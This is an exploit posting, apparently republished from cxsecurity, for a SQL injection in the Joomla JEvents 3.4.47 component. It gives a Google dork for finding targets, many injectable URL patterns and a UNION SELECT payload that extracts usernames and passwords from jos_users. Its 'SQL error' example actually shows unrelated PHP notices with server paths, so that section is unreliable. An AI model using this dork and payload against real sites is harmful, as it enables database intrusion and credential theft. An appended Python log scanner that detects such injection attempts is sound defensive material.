Joomla JEvents Components 3.4.47 SQL Injection

2019.01.31
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

####################################################################

# Exploit Title : Joomla JEvents Components 3.4.47 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 31/01/2019
# Vendor Homepage : jevents.net
# Software Download Link : jevents.net/download-area/jevents
# Software Information Link : extensions.joomla.org/extension/jevents/
# Software Version : 3.4.47
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_jevents''
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
JEvents is a well-known and loved events calendar / management solution for Joomla. JEvents provides a full events and calendar solution for your Joomla! site. Show your events in listings or as a visual monthly calendar view, create complex repeat patterns, import and export your events with a couple of clicks, and offer a feed with your latest events. The JEvents calendar is translated into more than 40 languages, so we are likely to have a translation for your website. JEvents offers complex repeating event patterns, repeating event exceptions, importing and exporting of calendars, and a sophisticated layout editor for event detail, event calendar, upcoming event list and even event creation pages.

####################################################################

# Impact :
**********
The JEvents 3.4.47 component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in the application's database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser.

####################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_jevents&Itemid=[SQL Injection]

/index.php?option=com_jevents&task=month.calendar&Itemid=[SQL Injection]

/index.php?option=com_jevents&task=modlatest.rss&format=feed&type=rss&Itemid=0&modid=[SQL Injection]

/index.php?option=com_jevents&task=month.calendar&year=[YEAR]&month=[MONTH]&day=[DAY]&Itemid=[ID-NUMBER]&pop=[SQL Injection]

/index.php?option=com_jevents&task=year.listevents&day=[DAY]&month=[MONTH]&year=[YEAR]&Itemid=0

/index.php?option=com_jevents&task=month.calendar&Itemid=[ID-NUMBER]&year=[YEAR]&month=[MONTH]&day=[DAY][SQL Injection]

/index.php?option=com_jevents&task=icalrepeat.detail&evid=[ID-NUMBER]&Itemid=[ID-NUMBER]&year=[YEAR]&month=[MONTH]&day=[DAY][SQL Injection]

/index.php?option=com_jevents&task=cat.listevents&year=[YEAR]&month=[MONTH]&day=[DAY]&Itemid=[ID-NUMBER]&pop=[ID-NUMBER]&tmpl=component&limitstart=[SQL Injection]

/component/jevents/day.listevents/[YEAR]/[MONTH]/[DAY]
/index.php?option=com_jevents&task=month.calendar&catids=[ID-NUMBER]&month=[MONTH]&year=[YEAR]&Itemid=[SQL Injection]

# Example Exploit Payload :
************************
union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--

####################################################################

# Example Vulnerable Sites :
*************************

####################################################################

# Example SQL Database Error :
****************************
Strict Standards: Only variables should be assigned by reference in /home/priosfor/public_html/Joomla/plugins/system/k2/k2.php on line 278

Deprecated: Assigning the return value of new by reference is deprecated in /home/hortonwi/public_html/components/com_jevents/libraries/helper.php on line 119

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
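
For defenders reviewing web-server logs, the following added example (not part of the original advisory or the JEvents code) flags com_jevents requests in which a parameter the advisory's URLs use as a number carries anything other than digits. The parameter set, the integer-only assumption and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory marks as injection points, plus the other numeric
# fields in the same URLs. Treating them all as integer-only is an assumption
# of this example, based on how the advisory's URLs use them.
NUMERIC_PARAMS = {"Itemid", "modid", "pop", "limitstart", "evid",
                  "year", "month", "day"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
DIGITS_RE = re.compile(r"[0-9]*")  # blank values are tolerated


def suspicious_params(url):
    """Return sorted (name, decoded value) pairs that are not plain integers."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if ("option", "com_jevents") not in params:
        return []  # not a JEvents request
    return sorted((k, v) for k, v in params
                  if k in NUMERIC_PARAMS and not DIGITS_RE.fullmatch(v))


def scan(log_lines):
    """Return (client_ip, url, findings) for every flagged access-log line."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = suspicious_params(m.group(1))
        if findings:
            hits.append((line.split(" ", 1)[0], m.group(1), findings))
    return hits


# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Jan/2019:10:00:01 +0000] "GET /index.php?option=com_jevents&task=month.calendar&Itemid=18 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [31/Jan/2019:10:00:05 +0000] "GET /index.php?option=com_jevents&Itemid=1%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [31/Jan/2019:10:00:09 +0000] "GET /index.php?option=com_jevents&task=modlatest.rss&format=feed&type=rss&Itemid=0&modid=0+union+select+1 HTTP/1.1" 200 900',
    '192.0.2.10 - - [31/Jan/2019:10:00:12 +0000] "GET /index.php?option=com_content&id=1%27 HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for ip, url, findings in scan(SAMPLE_LOG):
        print(ip, findings, url)
```

The same integer-only rule can be enforced at a WAF or reverse proxy in front of an unpatched site; values are checked after URL decoding, so encoded quotes and `+`-encoded spaces are caught.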



Copyright 2019, cxsecurity.com

 
